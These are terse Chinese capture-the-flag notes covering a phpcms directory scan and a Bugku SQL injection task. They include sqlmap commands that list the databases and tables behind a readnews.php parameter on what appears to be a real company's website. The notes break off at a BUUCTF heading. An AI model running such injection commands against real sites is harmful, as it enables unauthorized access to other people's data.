1 phpcmsv9
御剑扫描,访问.txt的网址,发现flag
2.bugku_cms1
…扫描不出来。。
3 实战2-注入
aboutnews里存在注入点
sqlmap爆表
包数据库sqlmap.py -u http://www.kabelindo.co.id/readnews.php?id=28 --dbs
爆指定数据库sqlmap.py -u http://www.kabelindo.co.id/readnews.php?id=28 -D u9897uwx_kabel --tables
得到flag
另:sql使用教程:https://www.jianshu.com/p/65d7522ecc1f
https://blog.csdn.net/qq_33530840/article/details/82144515
buuctf
1 easy_tornado分别打开